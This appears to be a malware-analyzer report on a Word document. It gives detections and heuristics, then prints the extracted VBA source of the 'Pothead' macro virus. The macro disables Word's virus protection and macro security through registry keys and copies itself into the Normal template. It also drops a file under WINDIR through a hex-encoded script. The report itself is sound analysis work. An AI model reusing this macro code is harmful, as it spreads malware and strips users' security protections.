MALICIOUS
288
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro designed to execute automatically. This macro attempts to lower macro security settings by writing to registry keys such as 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security'. The presence of a Shell() call within the VBA code strongly suggests that it is intended to download and execute a secondary payload, aligning with a common malware delivery technique.
Heuristics 6
-
ClamAV: Win.Trojan.Kallisti-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Kallisti-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 109216 bytes |
SHA-256: f1787ba5a4067b1083278fe00a006bb32ad53b54b4f7a8d220024b86c611283a |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
'Pothead
'(c) by Necronomikon/ZeroGravity
'----------------------------------------------------------
Word.Application.Options.VirusProtection = n
Word.Application.Options.ConfirmConversions = n
Word.Application.Options.SaveNormalPrompt = n
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
End Select
WordBasic.DisableAutoMacros 0
Application.DisplayStatusBar = False
ActiveDocument.ReadOnlyRecommended = False
On Error Resume Next: Randomize
Dim nec1 As Object, nec2 As Object, nec3 As Object, nec4 As Object, nec5 As Object
Dim thc As Object, lsd As Object, dope As Object, weed As Object, coke As Object
Set nec1 = ActiveDocument: Set nec2 = nec1.VBProject: Set nec3 = nec2.VBComponents: Set nec4 = nec3.Item(1): Set nec5 = nec4.CodeModule
Set thc = NormalTemplate: Set lsd = thc.VBProject: Set dope = lsd.VBComponents: Set weed = dope.Item(1): Set coke = weed.CodeModule
pshq = coke.countoflines: zero = nec5.countoflines: gravity = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)
If pshq < zero Then
For sysnec = 1 To pshq: NT5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To zero: peace = nec5.lines(sysnec, 1): coke.insertlines sysnec, peace: Next sysnec
NormalTemplate.Save: End If
If zero < pshq Then
For sysnec = 1 To zero: nec5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To pshq: peace = coke.lines(sysnec, 1): nec5.insertlines sysnec, peace: Next sysnec
ActiveDocument.Save: End If
End Sub
Private Sub Document_Close()
On Error Resume Next
Open Environ("WINDIR") & "\pothead.tmp" For Output As #1
Print #1, "n " & Environ("WINDIR") & "\POTHEAD.JPG"
Print #1, "e 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01"
Print #1, "e 0110 00 01 00 00 FF DB 00 43 00 06 04 05 06 05 04 06"
Print #1, "e 0120 06 05 06 07 07 06 08 0A 10 0A 0A 09 09 0A 14 0E"
Print #1, "e 0130 0F 0C 10 17 14 18 18 17 14 16 16 1A 1D 25 1F 1A"
Print #1, "e 0140 1B 23 1C 16 16 20 2C 20 23 26 27 29 2A 29 19 1F"
Print #1, "e 0150 2D 30 2D 28 30 25 28 29 28 FF DB 00 43 01 07 07"
Print #1, "e 0160 07 0A 08 0A 13 0A 0A 13 28 1A 16 1A 28 28 28 28"
Print #1, "e 0170 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0180 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0190 28 28 28 28 28 28 28 28 28 28 28 28 28 28 FF C2"
Print #1, "e 01A0 00 11 08 00 BD 02 37 03 01 22 00 02 11 01 03 11"
Print #1, "e 01B0 01 FF C4 00 1B 00 00 01 05 01 01 00 00 00 00 00"
Print #1, "e 01C0 00 00 00 00 00 00 05 01 02 03 04 06 00 07 FF C4"
Print #1, "e 01D0 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00"
Print #1, "e 01E0 00 00 00 00 01 02 03 04 05 FF DA 00 0C 03 01 00"
Print #1, "e 01F0 02 10 03 10 00 00 01 2F 14 10 73 55 D1 D7 03 0E"
Print #1, "e 0200 F8 18 E9 53 96 47 2B A5 14 F3 02 0C ED 05 54 09"
Print #1, "e 0210 36 26 AD 4F A1 CD 95 39 0E CA 55 B0 9F 23 78 68"
Print #1, "e 0220 07 55 95 1D 8B D9 87 39 D0 A6 79 5C E8 9B 9D E1"
Print #1, "e 0230 1D 68 26 0C F2 E7 91 AD 0B B3 BC 07 98 09 8C 3D"
Print #1, "e 0240 10 56 81 89 00 A2 34 F5 46 56 03 8A 0D 40 F3 81"
Print #1, "e 0250 BC 0E 3C 0A 81 A7 04 7A 66 D0 3A 81 87 86 40 37"
Print #1, "e 0260 38 0B 20 42 C8 5A ED 69 22 CA 35 AD 4F 65 A5 0D"
Print #1,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.